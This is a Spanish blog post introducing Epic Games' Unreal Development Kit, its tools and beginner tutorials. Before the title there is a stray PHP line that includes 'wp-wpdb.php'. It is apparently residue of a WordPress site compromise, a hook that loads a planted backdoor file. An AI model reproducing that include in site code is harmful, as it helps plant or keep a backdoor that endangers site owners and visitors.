if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); UDK, crea tus propios videojuegos – La Fortaleza de LeChuck

UDK, crea tus propios videojuegos

Que levante la mano quien no haya pensado alguna vez mientras juega algo como «¿Por qué después de cinco años de desarrollo y de gastarme 70 euros sigue habiendo bugs como éste?» o «Qué poco mimo le han puesto a este juego, yo le hubiera dado un final mejor a la historia«. ¿Nadie? No, tú pirateas hasta los Free 2 Play, así que no tienes derecho a quejarte. Es cierto que desarrollar un juego es un proceso muy costoso que en algunos casos involucra a miles de personas pero, ¿te has planteado alguna vez la posibilidad de poder crear tu propio videojuego, desarrollando tus propias ideas? Las compañías son cada vez más conscientes de que no les conviene desaprovechar el enorme esfuerzo que se requiere para crear un motor de videojuegos y algunas de ellas ya han puesto a disposición de los usuarios herramientas que facilitan el desarrollo y la creación de nuevos juegos utilizando motores ya existentes. Este es el caso de Epic Games con su Unreal Development Kit (UDK).

Existen varias librerías y motores que permiten a los usuarios adentrarse en el mundo de la creación de videojuegos. XNA, jMonkey Engine y Unity3D son ejemplos de herramientas que nos permiten generar nuestros propios mundos virtuales. El 5 de noviembre de 2009 Epic Games se subió al carro y publicó una versión gratuita de su Unreal Development Kit, que reune un conjunto de herramientas de desarrollo alrededor de su archiconocido Unreal Engine 3, motor con el que se han desarrollado juegos como Gears of War, Mirror’s Edge o Batman: Arkham City.

Antes que nada, vamos a conocer en qué consiste exactamente un motor de videojuegos. La creación de un juego desde cero supone una inmensa cantidad de trabajo. A la hora de mostrar cada imagen por pantalla, es necesario calcular la posición de cada objeto y sus colisiones con el resto, la iluminación aplicada, la inteligencia artificial oportuna, los sonidos que se tienen que reproducir y cómo se interactúa con el sistema operativo y con el jugador, entre otras muchas tareas. Es por eso que, lo más recomendable y lo que se suele hacer al enfrentarse a un desarrollo nuevo, es confiar todas estas actividades a una serie de herramientas que se encarguen de hacer todo este trabajo de bajo nivel y nos proporcionen una interfaz con la que operar sin preocuparnos de cuestiones tan específicas.
¿Y qué mejor que utilizar un motor del que han salido tantos juegazos? El primer paso es descargar el UDK desde su página oficial. El equipo de Epic lleva desde 2009 lanzando versiones mensuales de su kit de desarrollo, alcanzando un importante nivel de optimización. En la actualidad, existen versiones de la herramienta para PC e iOS, por lo que también podréis programar juegos para iPhone, iPad y iPod Touch.

Entre las herramientas que proporciona el UDK, podemos encontrar un profundo sistema de animaciones (Matinee), un lenguaje de programación propio, el UnrealScript y un sistema de scripting gráfico llamado Kismet, para aquellos que no tengan conocimientos de programación. Además, incluye un motor físico y de iluminación avanzada, un generador de terrenos y de entornos destruibles, e incluso un editor de secuencias cinemáticas. Como véis, las posibilidades que ofrece son inmensas y proporciona las herramientas necesarias para crear tanto juegos sencillos como proyectos más ambiciosos.
En la propia página del UDK podéis encontrar algunos de los proyectos que ya se han realizado con éste kit, que aparecen también reunidos en el siguiente video:

El punto débil del UDK es que sus requisitos recomendados para desarrollar un proyecto son bastante elevados, lo que era de esperar por otro lado, dado el motor que utiliza como base.

Existen diversos tutoriales y documentación relacionados con el Unreal Development Kit, tanto oficiales como realizados por aficionados. En lo personal, yo os recomiendo la serie de videotutoriales creada por The New Boston, que en su nivel principiante cuenta con 65 videos que tratan los aspectos más básicos del UDK. Aunque empezaron a publicar vídeos con aspectos más avanzados, al parecer el proyecto se congeló y no han seguido con la serie. De todos modos, son una herramienta muy útil para comenzar. Os dejo el primer video:

Si alguna vez habéis soñado con desarrollar vuestros propios videojuegos, os recomiendo encarecidamente que le echéis un vistazo a esta herramienta porque, aunque pueda parecer muy compleja al principio, os aseguro que poco a poco podréis avanzar y aprender lo básico de manera relativamente sencilla. ¡Esperamos vuestros juegos!
Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

2 comentarios

Dejar un comentario